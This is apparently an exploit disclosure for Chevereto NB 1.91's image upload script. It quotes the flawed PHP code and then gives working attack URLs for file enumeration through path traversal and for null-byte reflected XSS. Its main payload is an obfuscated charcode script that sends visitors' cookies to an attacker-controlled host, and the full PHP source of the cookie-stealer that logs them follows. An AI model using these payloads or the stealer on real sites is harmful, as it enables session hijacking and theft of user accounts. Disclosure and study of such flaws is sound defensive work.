Vuln Desc:
Vulnerable Code Section
//http://site.tld/whereunpacked/Upload/engine.php
if ($modo==2 || $modo==3) {
// INFORMACION (ANCHO, ALTO y PESO)
if ($modo==2) {
if ($_GET['v']) {
$id = $_GET['v'];
$imagen = DIR_IM.$id;
if (file_exists($imagen)==true) {
$titulo = SEEING.' '.$id.' '.AT.' ';
$info = getimagesize($imagen); //Obtenemos la informacion
$statinfo = @stat($imagen);
$ancho = $info[0];
$alto = $info[1];
$mime = $info['mime'];
$tamano = $statinfo['size']; //Bytes
$tamano_kb = round($tamano*0.0009765625, 2);
$canales = $info['channels'];
} else {
unset($modo);
$modo = 1;
$spit = true;
$errormsg = NOT_EXISTS;
$titulo = NOT_EXISTS_TITLE.ESP_TITULO;
}
}
}
// LAS URL
$URLimg = URL_SCRIPT.DIR_IM.$name;
$URLthm = URL_SCRIPT.DIR_TH.$name;
$URLvim = URL_SCRIPT.'?v='.$name;
$URLshr = $URLvim; // Para no cambiar mas abajo
$eu_img = urlencode($URLimg);
File existense enumeration:
http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php
Non persistent cROSS siTE sCRIPTING (XSS)
http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00<script>alert(1);</script>
Note:Null byte usage is neccessary here when exploiting XSS.See the vulnerable code section.
=======XSS STEAL COOKIE========
http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?v=../index.php%00</title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,108,111,99,97,116,105,111,110,46,114,101,112,108,97,99,101,40,34,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,48,46,49,53,47,108,101,97,114,110,47,119,111,114,107,47,120,115,115,46,112,104,112,63,116,120,116,61,34,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62));</script>
============EOF================
our charcoded XSS payload in this case is: <script>location.replace("http://192.168.0.15/learn/work/xss.php?txt="+document.cookie)</script>
And Finally:
//xss.php = is our cookie stealer.
<?php
error_reporting('off');
if(isset($_GET['txt']))
{
$cleanupitfirst=base64_encode(htmlentities($_GET['txt']));
$file='./s.txt';
$handle=fopen($file,'a+');
fwrite($handle,PHP_EOL .'============Decode It==========='. PHP_EOL .$cleanupitfirst. PHP_EOL . '============END OF==========='.PHP_EOL);
fclose($handle);
}
die('<script>location.replace("http://return_back.tld/blabla/");</script>');
Due trust to this issuse we can say previous versions too is affected by this vulns.
=================================== EOF =================================================
++++My Special Thanks to:++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com &&
to all AA Team &&+ to all
Azerbaijani Black Hatz;)
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^